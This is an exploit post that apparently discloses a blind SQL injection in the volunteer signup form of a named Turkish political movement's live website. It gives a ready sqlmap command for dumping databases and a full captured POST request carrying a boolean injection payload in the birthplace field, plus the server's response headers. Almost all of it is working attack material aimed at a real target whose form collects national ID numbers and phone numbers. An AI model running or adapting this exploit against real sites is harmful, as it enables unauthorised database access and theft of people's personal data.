# Exploit Title: Movement for Change in Turkey Blind SQL Injection Vuln
# Date: 2021-08-04
# Exploit Author: M3T4L & Ghostname
# Web Site: www.turkichackersrulez.org
# Tested on: Windows
python sqlmap.py -r 1.txt --dbs --batch
1.txt:
POST /gonullu-ol/ HTTP/1.1
Content-Length: 2467
Content-Type: multipart/form-data; boundary=-----Boundary_WVJGTHNLKM
X-Requested-With: XMLHttpRequest
Referer: https://tdp.org.tr/
Cookie: PHPSESSID=65pge6o2eqoeti1q4aajuga2nv; views_453=1; views_450=1; views_447=1; views_383=1; views_376=1; views_440=1; views_420=1; views_403=1; views_81=1; views_421=1; views_374=1; views_169=1; views_166=1; views_394=1; views_89=1; views_155=1; views_91=1; views_92=1; views_160=1; views_437=1; views_156=1; views_377=1; views_90=1; views_451=1; views_80=1; views_350=1; views_386=1; views_168=1; views_419=1; views_328=1; views_355=1; views_446=1; views_452=1; views_428=1; views_449=1; views_416=1; views_436=1; views_365=1; volunteer_step1=%7B%22submit_step1%22%3A%22true%22%2C%22cep_telefonu%22%3A%22555-666-0606%22%2C%22d_ay%22%3A%223%22%2C%22d_gun%22%3A%223%22%2C%22d_yil%22%3A%222020%22%2C%22tckimlikno%22%3A%221%22%2C%22tcyok%22%3A%2291628091376%22%7D; views_314=1; views_318=1; views_326=1; views_324=1; views_356=1; views_74=1; views_73=1; views_70=1; views_152=1; views_151=1; views_75=1; views_69=1; views_71=1; views_77=1; views_150=1; views_153=1; views_154=1; views_323=1; views_312=1; views_317=1; views_310=1; views_316=1; views_325=1; views_322=1; views_327=1; views_321=1; views_320=1; views_311=1; views_296=1; views_305=1; views_295=1; views_173=1; views_176=1
Host: tdp.org.tr
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Content-Type: multipart/form-data; boundary=-----Boundary_VBWNDETJEB
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="ad"
1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="ayrilan_zaman"
1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="birim"
1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="calisma_durumu"
1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="cep_telefonu"
555-666-0606
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="cinsiyet"
1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="cocuksayi"
0
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="detay_adres"
20
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="dogumyeri_il"
-1' OR 3*2*1=6 AND 000879=000879 --
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="dogumyeri_ilce"
1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="d_ay"
1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="d_gun"
1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="d_yil"
2020
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="egitimdurumu"
1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="eposta"
1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="gorus_oneri"
1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="ikametil"
9999
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="ikametilce"
1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="kangrubu"
1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="katilim_durumu"
1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="medenidurum"
1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="meslek"
1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="sandikgorevlisi"
1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="soyad"
1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="tckimlikno"
1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="tcyok"
91628091376
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="telefonizin"
1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="file"; filename="acunetix.txt"
Content-Type: text/plain
-------Boundary_VBWNDETJEB--
Response
HTTP/1.1 200 OK
Date: Wed, 04 Aug 2021 16:31:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/7.4.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: volunteer_step2=%7B%22ad%22%3A%221%22%2C%22ayrilan_zaman%22%3A%221%22%2C%22birim%22%3A%221%22%2C%22calisma_durumu%22%3A%221%22%2C%22cep_telefonu%22%3A%22555-666-0606%22%2C%22cinsiyet%22%3A%221%22%2C%22cocuksayi%22%3A%220%22%2C%22detay_adres%22%3A%2220%22%2C%22dogumyeri_il%22%3A%22-1%5C%5C%27%20OR%203%2A2%2A1%3D6%20AND%20000879%3D000879%20--%20%22%2C%22dogumyeri_ilce%22%3A%221%22%2C%22d_ay%22%3A%221%22%2C%22d_gun%22%3A%221%22%2C%22d_yil%22%3A%222020%22%2C%22egitimdurumu%22%3A%221%22%2C%22eposta%22%3A%221%22%2C%22gorus_oneri%22%3A%221%22%2C%22ikametil%22%3A%229999%22%2C%22ikametilce%22%3A%221%22%2C%22kangrubu%22%3A%221%22%2C%22katilim_durumu%22%3A%221%22%2C%22medenidurum%22%3A%221%22%2C%22meslek%22%3A%221%22%2C%22sandikgorevlisi%22%3A%221%22%2C%22soyad%22%3A%221%22%2C%22tckimlikno%22%3A%221%22%2C%22tcyok%22%3A%2291628091376%22%2C%22telefonizin%22%3A%221%22%7D; expires=Wed, 04-Aug-2021 17:31:34 GMT; Max-Age=3600
X-Powered-By: PleskLin
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ptHlG8gftwSsZLoGiv260DUn3F4%2BSTpk20rw%2FsWMjPTGx83veJZvnELDlKxW01ffCFfAzuNPsUnp41UPm7aIe6F%2BNiTJY0%2BhZO%2FdxcmQK4SFrOyOZJr1WQIedAYS"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 67992d3d3889b75d-CDG
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
Original-Content-Encoding: gzip
Content-Length: 104795
